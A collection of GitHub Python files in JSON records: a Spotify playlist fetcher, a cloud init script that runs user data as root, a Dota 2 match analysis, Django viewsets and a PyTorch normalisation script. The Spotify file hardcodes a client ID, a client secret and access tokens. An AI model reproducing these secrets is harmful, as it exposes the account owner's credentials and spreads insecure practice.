"stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt6.QtWidgets.QWidget", "line_number": 9, "usage_type": "name"}, {"api_name": "BlurWindow.blurWindow.GlobalBlur", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "13383015207", "text": "from contextlib import nullcontext\nimport copy\nfrom distutils.log import error\nfrom pyexpat.model import XML_CTYPE_ANY\nimport sqlite3\nfrom textwrap import indent\nfrom xml.etree.ElementTree import tostring\n# from flask import Flask\n# import sqlalchemy\nimport pandas as pd \n# from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\n# from keyvalue_sqlite import KeyValueSqlite\nimport base64\n\nCLIENT_ID = \"7ece4bb7979f433ab4a0a604bc2f97b5\"\nCLIENT_SECRET = \"3e59cc5912dc4a47b39f7fc2db529366\"\n\nDATABASE_LOCATION = \"sqlite:///my_playlists.sqlite\"\nUSER_ID = \"22io3oxgaphrgsxto4naqh4ai\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlists/\nUSER_PLAYLISTS_TOKEN = \"BQBkjR6NT3Stt-8SxTmWs_-86SAnegsLlLpEytdJhK4SjxyY5r8s5RPr9qhlDA3ONG8HyXACdhEdWyFzY6NiuFkMzLu9wzMBVaLYe53LgJLiqTT8_5lFtf7LhCkMzBkiZ0cQDw8P5UTP3sG3jtxr6ioPnOvz4jIXIHt711Smx51ZctObCf4jCJVaMnfwpndneHLOWh5JRkDb_ukH_2c\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlist-tracks/\nPLAYLISTS_TOKEN = \"BQD-X2c9Lob2zOuha2mJ_e1SXHe1CKaFpQ9DuM20QyRsccUwfXn4L8URLlaaO351jJdVfDYX2I2OGuVmsG-n8eBsCFm9TVuf_ksEDuQeTrSd3X9siWLDDiciXlYWXTvNr9PNq2oFCgHNJzw2Uu9pga2FI3rohOzDx0hzNqhT65MTJ5xzZGdjWaS_DLEbGeK5erYr8Owq014qaYq3\"\n\n# Get New ID here -> https://developer.spotify.com/console/get-playlist-tracks/\nPLAYLIST_ITEMS_TOKEN = \"\"\n\ndef getAccessToken(clientID, clientSecret):\n client_id_and_secret = '{client_id}:{client_secret}'.format(client_id=clientID, client_secret=clientSecret)\n client_data = base64.urlsafe_b64encode(client_id_and_secret.encode()).decode()\n\n endpoint = \"https://accounts.spotify.com/api/token\"\n headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Authorization': 'Basic {}'.format(client_data)}\n payload = {'grant_type': 'client_credentials'}\n access_token_request = requests.post(endpoint, headers=headers, data=payload)\n\n responseObject = access_token_request.json()\n access_token = responseObject['access_token']\n\n return access_token\n\n# def apiGetSpotify(ep):\n# access_token = getAccessToken(CLIENT_ID, CLIENT_SECRET)\n# if ep.startswith(\"https://\"):\n# endpoint = ep\n# else:\n# endpoint = 'https://api.spotify.com/v1/' + ep\n\n# headers = {'Authorization': 'Bearer ' + access_token}\n\n# try:\n# response = requests.get(endpoint, headers=headers, verify=False)\n# except Exception as ex:\n# print(\"err - common.py - apiGetSpotify3 --> \" + str(type(ex)) + \" - \" + str(ex.args) + \" - \" + str(ex))\n# return ''\n# return response.json()\n\n# def check_if_valid_data(df: pd.DataFrame) -> bool:\n# # Check if dataframe is empty\n# if df.empty:\n# print(\"No playlists downloaded. Finishing execution\")\n# return False \n\n# # Primary Key Check\n# if pd.Series(df['played_at']).is_unique:\n# pass\n# else:\n# raise Exception(\"Primary Key check is violated\")\n\n# # Check for nulls\n# if df.isnull().values.any():\n# raise Exception(\"Null values found\")\n\n# # # Check that all timestamps are of yesterday's date\n# # yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n# # yesterday = yesterday.replace(hour=0, minute=0, second=0, microsecond=0)\n\n# # timestamps = df[\"timestamp\"].tolist()\n# # for timestamp in timestamps:\n# # if datetime.datetime.strptime(timestamp, '%Y-%m-%d') != yesterday:\n# # raise Exception(\"At least one of the returned playlists does not have a yesterday's timestamp\")\n# return True\n\ndef getLikedTracks(token, id):\n offset = 0\n tracks = {}\n while offset < 10000:\n endpoint = \"https://api.spotify.com/v1/playlists/{playlist_id}/tracks?offset={offset}&limit=10\".format(playlist_id = id, offset = offset)\n headers = {\n \"Accept\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token),\n \"Content-Type\" : \"application/json\"}\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n for track in range(0, len(user_playlists)):\n try:\n tracks.update({user_playlists['items'][track]['track'][\"id\"] : user_playlists['items'][track]['track'][\"name\"]}) # TRACK_NAME : TRACK_ID\n except IndexError: break\n else: continue\n offset += 10\n return tracks\n\nLIKED_TRACKS = getLikedTracks(PLAYLISTS_TOKEN, \"2OoFqFk4QYnb6DFwifnqlG\") \n\ndef getTracks(token, id):\n offset = 0\n tracks = {}\n while offset < 100:\n endpoint = \"https://api.spotify.com/v1/playlists/{playlist_id}/tracks?offset={offset}&limit=10\".format(playlist_id = id, offset = offset)\n headers = {\n \"Accept\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token),\n \"Content-Type\" : \"application/json\"}\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n for track in range(0, len(user_playlists)):\n try:\n if user_playlists['items'][track]['track'][\"id\"] not in LIKED_TRACKS.keys():\n tracks.update({user_playlists['items'][track]['track'][\"id\"] : user_playlists['items'][track]['track'][\"name\"]}) # TRACK_NAME : TRACK_ID\n except IndexError: break\n else: continue\n offset += 10\n return tracks\n\n\n# TODO: need to find away to access user Liked Songs playlist\n# def getPlaylistItems(id):\n# endpoint = \"https://api.spotify.com/v1/{playlist_id}/tracks?offset=0&limit=50\".format(playlist_id = id)\n# headers = {\n# \"Accept\" : \"application/json\",\n# \"Authorization\" : \"Bearer {token}\".format(token=token),\n# \"Content-Type\" : \"application/json\"\n# }\n# user_playlists_request = requests.get(endpoint, headers = headers)\n\n# user_playlists = user_playlists_request.json()\n\n# return user_playlists\n\n# def getTracksFromLikedList():\n# print(\"msg - common.py - getTracksFromLikedList --> requesting tracks from liked list.\") \n# liked_tracks = apiGetSpotify(\"me/tracks?offset=0&limit=50\")\n\n \n# '''--> check response before continuing'''\n# if liked_tracks == '':\n# print(\"err - common.py - getTracksFromLikedList2 --> empty api response for liked tracks!\")\n# return ''\n\n\n# try:\n# '''--> check pagination - fill resultlist'''\n# resultList = []\n# total = liked_tracks[\"total\"]\n# limit = liked_tracks[\"limit\"]\n# offset = liked_tracks[\"offset\"]\n\n# while offset < total:\n# for track in liked_tracks[\"items\"]:\n# if track[\"track\"][\"id\"]: #check if valid item\n# resultList.append(track[\"track\"][\"id\"]) #add track ID to resultList\n# offset = offset + limit\n# if offset < total: #new request\n# liked_tracks = apiGetSpotify(\"me/tracks?offset=\" + str(offset) + \"&limit=\" + str(limit))\n# if liked_tracks == '': #invalid api response\n# print(\"err - common.py - getTracksFromLikedList3 --> empty api response for liked tracks!\")\n# return ''\n# continue\n\n# print(\"msg - common.py - getTracksFromLikedList4 --> Succesfully returned list of \" + str(len(resultList)) + \" tracks from liked list.\")\n# return resultList\n\n# except Exception as ex:\n# print(\"err - common.py - getTracksFromLikedList5 --> \" + str(type(ex)) + \" - \" + str(ex.args) + \" - \" + str(ex))\n# return ''\n\ndef getUserPlaylists(token, id):\n endpoint = \"https://api.spotify.com/v1/users/{user_id}/playlists/\".format(user_id = id)\n headers = {\n \"Accept\" : \"application/json\",\n \"Content-Type\" : \"application/json\",\n \"Authorization\" : \"Bearer {token}\".format(token=token)\n }\n\n user_playlists_request = requests.get(endpoint, headers = headers)\n user_playlists = user_playlists_request.json()\n\n mixtape_choices = [\"Daily Mix 1\", \"Daily Mix 2\", \"Daily Mix 3\", \"Daily Mix 4\", \"Daily Mix 5\", \"Daily Mix 6\", \"Discover Weekly\", \"Release Radar\"]\n playlist_titles = {}\n for title in range(0, len(user_playlists['items'])) : \n if user_playlists['items'][title][\"name\"] in mixtape_choices:\n playlist_titles.update({user_playlists['items'][title][\"id\"] : user_playlists['items'][title][\"name\"]}) # PLAYLIST_ID : PLAYLIST_NAME\n playlist_dict = {}\n for playlist in range(0, len(playlist_titles)) :\n tracks = getTracks(PLAYLISTS_TOKEN, list(playlist_titles.keys())[playlist]) \n playlist_dict.update({playlist : {\"id\":list(playlist_titles.keys())[playlist], \"name\":list(playlist_titles.values())[playlist], \"tracks\":tracks}}) \n # INDEX : {\n # TRACK_ID : \n # TRACK_NAME :\n # TRACK_TRACKS : {Track_ID : track_title}}\n \n return json.dumps(playlist_dict, indent = 4)\n\n\nif __name__ == \"__main__\":\n print(getUserPlaylists(USER_PLAYLISTS_TOKEN, USER_ID))\n # print(getTracks(PLAYLISTS_TOKEN, \"2OoFqFk4QYnb6DFwifnqlG\"))\n # print(getTracksFromLikedList())\n # print(getAccessToken(CLIENT_ID, CLIENT_SECRET))\n # playlist_url = []\n \n\n # # Extracting only the relevant bits of data from the json object \n # for playlist in data:\n # playlist_id.append(playlist[\"items\"][\"id\"])\n # playlist_names.append(playlist[\"items\"][0][\"name\"])\n # playlist_url.append(playlist[\"items\"][0][\"external_urls\"][\"spotify\"])\n # tracks[playlist].append(playlist[\"items\"][0][\"tracks\"][\"name\"])\n \n \n # # Prepare a dictionary in order to turn it into a pandas dataframe below \n # playlist_dict = {\n # \"playlist_id\" : playlist_id,\n # \"playlist_name\" : playlist_names,\n # \"playlist_url\" : playlist_url,\n # \"tracks\": tracks\n # }\n\n # playlist_df = pd.DataFrame(playlist_dict, columns = [\"playlist_id\", \"playlist_name\", \"playlist_url\", \"tracks\"])\n \n # print(playlist_df)\n\n # # Validate\n # if check_if_valid_data(playlist_df):\n # print(\"Data valid, proceed to Load stage\")\n\n # # engine = sqlalchemy.create_engine(DATABASE_LOCATION)\n # conn = sqlite3.connect('my_playlists.sqlite')\n # # cursor = conn.cursor()\n\n # # sql_query = \"\"\"\n # # CREATE TABLE IF NOT EXISTS my_playlists(\n # # playlist_name VARCHAR(200),\n # # artist_name VARCHAR(200),\n # # played_at VARCHAR(200),\n # # timestamp VARCHAR(200),\n # # CONSTRAINT primary_key_constraint PRIMARY KEY (played_at)\n # # )\n # # \"\"\"\n\n # # sql_query_two = \"\"\"insert or replace into my_playlists (playlist_name,artist_name,played_at,timestamp) values (?,?,?)\"\"\"\n\n # # cursor.execute(sql_query)\n # # cursor.execute(sql_query_two)\n\n # print(\"Opened database successfully\")\n\n # try:\n # playlist_df.to_sql(\"my_playlists\", conn, index=False, if_exists='replace')\n # except:\n # print(\"Data already exists in the database\")\n\n # # df = pd.read_sql_query('SELECT * FROM my_playlists', conn, parse_dates=[\"playlist_name\"])\n\n # conn.close()\n # print(\"Close database successfully\")\n # print(df.head)\n \n # Job scheduling \n# def gettrackAudioFeatures(token, ids):\n# endpoint = \"https://api.spotify.com/v1/audio-features?ids={ids}\"\n# getHeader = {\n# \"Accept\" : \"application/json\",\n# \"Content-Type\" : \"application/json\",\n# \"Authorization\" : \"Bearer {token}\".format(token=token)\n# }\n\n# res = requests.get(endpoint, headers=getHeader)\n# track_features = res.json()\n \n# return track_features", "repo_name": "NoelBram/mySpotify", "sub_path": "database/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 36, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 101, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 123, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "72313973953", "text": "#!/usr/bin/env python\nimport syslog\nfrom user_data import get_user_data\nimport tempfile\nfrom subprocess import call\nimport os\nimport stat\n\n# Pull the init script out of user data if it exists\nuser_data = get_user_data()\n\nif not user_data.get('init'):\n syslog.syslog(syslog.LOG_WARNING, 'Skipping init script (non-given)...')\n exit(0)\n\ninit_script = user_data['init'].lstrip()\n\nif not init_script.startswith('#!'):\n syslog.syslog(syslog.LOG_WARNING, 'Skipping init script (does not start with shebang #!)...')\n exit(0)\n\nscript_file = tempfile.NamedTemporaryFile(delete=False)\n\ntry:\n script_file.write(init_script)\n script_file.close()\n os.chmod(script_file.name, stat.S_IXUSR | stat.S_IRUSR)\n\n # We have the file, now let's run it\n syslog.syslog(syslog.LOG_WARNING, 'Running init script (%s)...' % script_file.name)\n \n # Note, this runs as root\n if call([script_file.name]) != 0:\n syslog.syslog(syslog.LOG_WARNING, \"Failed to successfully run init script\")\n else:\n syslog.syslog(syslog.LOG_WARNING, 'Init script run successfully')\nfinally:\n os.remove(script_file.name)\n", "repo_name": "hayesgm/cerberus", "sub_path": "scripts/cerberus_user_init.py", "file_name": "cerberus_user_init.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "user_data.get_user_data", "line_number": 10, "usage_type": "call"}, {"api_name": "user_data.get", "line_number": 12, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 13, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 13, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 19, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.chmod", "line_number": 27, "usage_type": "call"}, {"api_name": "stat.S_IXUSR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "stat.S_IRUSR", "line_number": 27, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 30, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subprocess.call", "line_number": 33, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 34, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 34, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 36, "usage_type": "call"}, {"api_name": "syslog.LOG_WARNING", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "21260325192", "text": "import numpy as np\nimport torch, torchvision\nfrom torch import nn\nimport datetime\nfrom tqdm import tqdm\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom os import listdir\nfrom data.MyDataset import *\n\nPATH_dict = {\n '10K': 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenkblobs/',\n 'gamer': 'C:/Data/DeepEye/Foss_student/tenkblobs/',\n '224' : 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenhblobsA/',\n 'validation' : 'C:/ASB/Projects/EyefossAutoencoder/Fagprojekt-2021/validation_grain/',\n 'mix' : 'C:/ASB/Projects/EyefossAutoencoder/Fagprojekt-2021/grainmix'\n}\n\npath = PATH_dict['validation']\n\nmu = np.load('../MEAN.npy')\nstd = np.load('../STD.npy')\n\nprint(f'mean: {m}\\n std:{s}')\n\n\nS = transforms.Compose([Mask_n_pad(H=180, W=80), transforms.ToTensor()])\nDataset = KornDataset(data_path=path, transform=S, label_path=None)\n\nbatchsize = 2000\nprint(120000/batchsize)\n\nSTATloader = DataLoader(Dataset, batch_size=batchsize, num_workers=0)\n\nTens = transforms.ToTensor()\n\nmeans = []\nstds = []\n\nrun_mean = 0\nrun_std = 0\n\nfor inputs, label in tqdm(STATloader, colour='green'):\n #print(inputs[0][0][80:90])\n temp_mean = torch.mean(inputs, dim=(0, 2, 3))\n temp_std = torch.std(inputs, dim=(0, 2, 3))\n\n run_mean += temp_mean\n run_std += temp_std\n\n\n\nrun_mean /= 120000/batchsize\nrun_std /= 120000/batchsize\n\n\nnp.save('../MEAN', run_mean)\nnp.save('../STD', run_std)\n\nprint(run_mean)\nprint(run_std)\n\n\n\n\n\n\"\"\"\n\nPATH_dict = {'10K': 'M:/R&D/Technology access controlled/Projects access controlled/AIFoss/Data/Foss_student/tenkblobs/',\n 'gamer': 'C:/Data/DeepEye/Foss_student/tenkblobs/'}\n\n### If training on Foss Laptop select '10K'\n### If training on Gamer select 'gamer'\nPATH = PATH_dict['gamer']\n\ndef stat_npy_dir(path: str, subset: str):\n path = path + subset\n\n\n data_x = []\n data_y = []\n\n folder = listdir(path)\n folder_images = len(folder)\n for i, NPY in enumerate(folder):\n\n if i % 10 == 0:\n\n print(f'Images loaded: [{i}/{folder_images}] ------ {str(datetime.datetime.now())[11:-7]}')\n\n img, _ = np.load(path+NPY, allow_pickle=True)\n data_x.append(img)\n\n\n print(f'Done reading {subset} images')\n wx = torch.tensor(data_x, dtype=torch.float)\n print('Begining permute')\n tx = wx.permute(0, 3, 1, 2)\n print('Finished permute')\n\n mean = torch.mean(tx, dim=(0, 2, 3))\n std = torch.std(tx, dim=(0, 2, 3))\n\n np.save('10K_mean', mean)\n np.save('10K_std', std)\n\n print(mean)\n print(std)\n\n\nstat_npy_dir(PATH,'train/')\n\n#xtrain = torch.normal(mean=10, std=2, size=(100, 8, 10, 10))\n\"\"\"", "repo_name": "Eortvald/Foss-autoencoder", "sub_path": "autoencoder/mean-std_dataset.py", "file_name": "mean-std_dataset.py", "file_ext": "py", "file_size_in_byte": 2733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.std", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "9926975845", "text": "from .models import ThesisProject, Invite\nfrom .serializers import ThesisProjectSerializer, InviteSerializer\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, mixins\n\n\nclass CustomViewSet(\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet,\n):\n pass\n\n\nclass ThesisProjectsViewSet(CustomViewSet):\n queryset = ThesisProject.objects.all()\n serializer_class = ThesisProjectSerializer\n\n @action(detail=False, methods=[\"get\"])\n def ongoing(self, request):\n user = request.user\n queryset = self.get_queryset().filter(approved=False, author__user=user)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n @action(detail=False, methods=[\"get\"])\n def approved(self, request):\n user = request.user\n queryset = self.get_queryset().filter(approved=True, author__user=user)\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass InvitesViewSet(viewsets.ModelViewSet):\n queryset = Invite.objects.all()\n serializer_class = InviteSerializer\n\n @action(detail=True, methods=[\"post\"])\n def accept(self, request, pk=None):\n user = request.user\n invite = (\n self.get_queryset()\n .filter(accepted=False, id=pk, advised__user=user)\n .first()\n )\n\n if not invite:\n return Response({\"error\": \"Convite não encontrado.\"})\n\n research_title = f\"Pesquisa de {invite.advised.user}\"\n\n research = ThesisProject.objects.create(\n invite=invite,\n title=research_title,\n type=invite.type,\n advisor=invite.advisor,\n author=invite.advised,\n )\n\n research.save()\n\n invite.accepted = True\n invite.save()\n\n return Response()\n\n def get_queryset(self):\n user = self.request.user\n queryset = super().get_queryset()\n queryset = queryset.filter(advised__user=user)\n return queryset\n", "repo_name": "patrickbindelli/gestao-tcc-back", "sub_path": "research/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2181, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 9, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "models.ThesisProject.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.ThesisProject", "line_number": 19, "usage_type": "name"}, {"api_name": "serializers.ThesisProjectSerializer", "line_number": 20, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Invite.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Invite.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Invite", "line_number": 38, "usage_type": "name"}, {"api_name": "serializers.InviteSerializer", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 51, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects.create", "line_number": 55, "usage_type": "call"}, {"api_name": "models.ThesisProject.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.ThesisProject", "line_number": 55, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "23928396318", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 10 16:10:56 2021\r\n\r\n@author: Tooru Ogata y Jhosua Torres\r\nproyect: Predicción de resultados de partidas de dota2\r\n\r\nsource: https://www.opendota.com/explorer\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\n\r\npath = r'D:\\Otros Proyectos\\Dota2\\data'\r\nos.chdir(path)\r\n\r\nyear_0 = 2018\r\nyear_1 = 2021\r\n\r\nroot_filename = 'query2_dota2_'\r\n\r\n'''\r\n1. Abriendo la data\r\n'''\r\n\r\nteam_name = pd.read_csv('dota2_team.csv')\r\nteam_name.columns = ['team_id','team_name', 'team_tag']\r\n\r\ndf_append = pd.DataFrame()\r\nfor year in range(year_0,year_1+1):\r\n filename = str(root_filename) + str(year) + r'.csv'\r\n df = pd.read_csv(filename)\r\n df['year'] = year\r\n df_append = df_append.append(df)\r\n del df \r\n\r\ndf_append['team_id'] = np.where(df_append['radiant_win'] == df_append['win'], df_append['radiant_team_id'], df_append['dire_team_id'])\r\ndf_append.columns\r\n\r\ndf_append = pd.merge(df_append, team_name, left_on=['team_id'] , right_on=['team_id'], how='left')\r\n\r\n \r\n'''\r\n2. Feature Engineering\r\n''' \r\n\r\ndf_append.columns\r\n\r\n#Maestro de teams\r\ndf_teams = df_append[['year','match_id','team_name','win']]\r\ndf_teams = pd.get_dummies(df_teams, prefix='win', columns=['win'])\r\ndf_teams = df_teams.dropna()\r\ndf_teams = df_teams.drop_duplicates()\r\n\r\n#Creación de dummies\r\nrole_list = ['Support','Nuker','Initiator','Escape','Durable','Disabler','Carry','Jungler','Pusher' ]\r\n\r\nfor rol in role_list:\r\n df_append[rol] = df_append['roles'].str.contains(rol).astype(int)\r\n\r\ndf_append = pd.get_dummies(df_append, prefix='attribute', columns=['primary_attr'])\r\ndf_append = pd.get_dummies(df_append, prefix='attack', columns=['attack_type'])\r\n\r\n#Group by player/hero last 5-10 matches\r\ndf_player = df_append\r\ndf_player = df_player.drop(labels=[\"team_name\"], axis=1)\r\ndf_player = df_player.groupby(['win','year','match_id','start_time','account_id','hero_id','name'], as_index=False).agg( duration=('duration','mean'), \r\n sum_support=('Support','sum'), \r\n sum_nuker=('Nuker','sum'), \r\n sum_initiator=('Initiator','sum'), \r\n sum_escape=('Escape','sum'), \r\n sum_durable=('Durable','sum'), \r\n sum_disabler=('Disabler','sum'), \r\n sum_carry=('Carry','sum'), \r\n sum_jungler=('Jungler','sum'), \r\n sum_pusher=('Pusher','sum'), \r\n sum_agi=('attribute_agi','sum'), \r\n sum_int=('attribute_int','sum'), \r\n sum_str=('attribute_str','sum'), \r\n sum_melee=('attack_Melee','sum'), \r\n sum_ranged=('attack_Ranged','sum'), \r\n sum_kills=('kills','sum'), \r\n sum_deaths= ('deaths','sum'),\r\n sum_assists= ('assists','sum'),\r\n mean_lasthits= ('last_hits','mean'),\r\n mean_denies= ('denies','mean'),\r\n sum_observers= ('observers_placed','sum'),\r\n sum_towers= ('towers_killed','sum'),\r\n mean_gold_min=('gold_per_min','mean'),\r\n mean_exp_min=('xp_per_min','mean'))\r\n\r\n\r\n\r\n\r\n\r\ndf_append.columns\r\n\r\n#Group by sum y mean a nivel de match\r\ndf_append = df_append.groupby(['win','year','match_id','start_time'], as_index=False).agg( duration=('duration','mean'), \r\n sum_support=('Support','sum'), \r\n sum_nuker=('Nuker','sum'), \r\n sum_initiator=('Initiator','sum'), \r\n sum_escape=('Escape','sum'), \r\n sum_durable=('Durable','sum'), \r\n sum_disabler=('Disabler','sum'), \r\n sum_carry=('Carry','sum'), \r\n sum_jungler=('Jungler','sum'), \r\n sum_pusher=('Pusher','sum'), \r\n sum_agi=('attribute_agi','sum'), \r\n sum_int=('attribute_int','sum'), \r\n sum_str=('attribute_str','sum'), \r\n sum_melee=('attack_Melee','sum'), \r\n sum_ranged=('attack_Ranged','sum'), \r\n sum_kills=('kills','sum'), \r\n sum_deaths= ('deaths','sum'),\r\n sum_assists= ('assists','sum'),\r\n mean_lasthits= ('last_hits','mean'),\r\n mean_denies= ('denies','mean'),\r\n sum_observers= ('observers_placed','sum'),\r\n sum_towers= ('towers_killed','sum'),\r\n mean_gold_min=('gold_per_min','mean'),\r\n mean_exp_min=('xp_per_min','mean'))\r\n\r\n#Porcentaje de roles\r\ndf_append['sum_roles'] = df_append['sum_support'] + df_append['sum_nuker'] + df_append['sum_initiator'] + df_append['sum_escape'] + df_append['sum_durable'] + df_append['sum_disabler'] + df_append['sum_carry'] + df_append['sum_jungler'] + df_append['sum_pusher'] \r\n\r\ndf_append['sum_support'] = df_append['sum_support']/df_append['sum_roles'] \r\ndf_append['sum_nuker'] = df_append['sum_nuker']/df_append['sum_roles'] \r\ndf_append['sum_initiator'] = df_append['sum_initiator']/df_append['sum_roles'] \r\ndf_append['sum_escape'] = df_append['sum_escape']/df_append['sum_roles'] \r\ndf_append['sum_durable'] = df_append['sum_durable']/df_append['sum_roles'] \r\ndf_append['sum_disabler'] = df_append['sum_disabler']/df_append['sum_roles'] \r\ndf_append['sum_carry'] = df_append['sum_carry']/df_append['sum_roles'] \r\ndf_append['sum_jungler'] = df_append['sum_jungler']/df_append['sum_roles'] \r\ndf_append['sum_pusher'] = df_append['sum_pusher']/df_append['sum_roles'] \r\n\r\n#Porcentaje primary attribute\r\ndf_append['sum_agi'] = df_append['sum_agi']/5\r\ndf_append['sum_int'] = df_append['sum_int']/5\r\ndf_append['sum_str'] = df_append['sum_str']/5\r\n\r\n#Porcentaje melee/ranged\r\ndf_append['sum_melee'] = df_append['sum_melee']/5\r\ndf_append['sum_ranged'] = df_append['sum_ranged']/5\r\n\r\n#Target dummy result win and lose\r\ndf_append = pd.get_dummies(df_append, prefix='win', columns=['win'])\r\n\r\n#Merge to teams first non missing\r\ndf_append = pd.merge(df_append, df_teams, left_on=['year','match_id', 'win_False', 'win_True'] , right_on=['year','match_id', 'win_False', 'win_True'], how='left')\r\ndel df_teams\r\n\r\ndf_append.to_csv('data_consolidada.csv')\r\n\r\n'''\r\n3. Models 1\r\n''' \r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndf_append = pd.read_csv('data_consolidada.csv')\r\n\r\nx = df_append[['duration', 'sum_support',\r\n 'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n 'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n 'sum_int', 'sum_str', 'sum_melee', 'sum_ranged', 'sum_kills',\r\n 'sum_deaths', 'sum_assists', 'mean_lasthits', 'mean_denies',\r\n 'sum_observers', 'sum_towers', 'mean_gold_min', 'mean_exp_min']]\r\ny = 